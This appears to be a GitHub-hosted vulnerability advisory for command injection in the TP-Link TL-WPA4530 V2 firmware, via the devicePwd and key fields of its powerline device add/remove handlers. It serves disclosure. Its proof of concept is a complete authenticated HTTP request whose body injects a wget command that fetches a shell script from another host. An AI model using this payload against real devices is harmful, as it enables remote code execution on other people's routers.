Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

TP-Link TL-WPA4530 V2 Vulnerability

Several command injection vulnerabilities are found in the latest version of TL-WPA4530 V2 firmware

Vulnerability Description

There is a command injection vulnerability in function _httpRpmPlcDeviceAdd and _httpRpmPlcDeviceRemove. After authentication, an attacker can set devicePwd or key field in requests to launch a remote-code-execution attack.

devicePwd

devicePwd

PoC

PoC for triggering _httpRpmPlcDeviceAdd

POST /admin/powerline?form=plc_add HTTP/1.1
Host: 192.168.100.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Origin: http://192.168.100.2
Connection: close
Referer: http://192.168.100.2/
Cookie: Authorization=XXXXXXX

xxxxxxxxxxxxxxxxxxxxxxxxxx;wget http://192.168.100.254:8000/net.sh;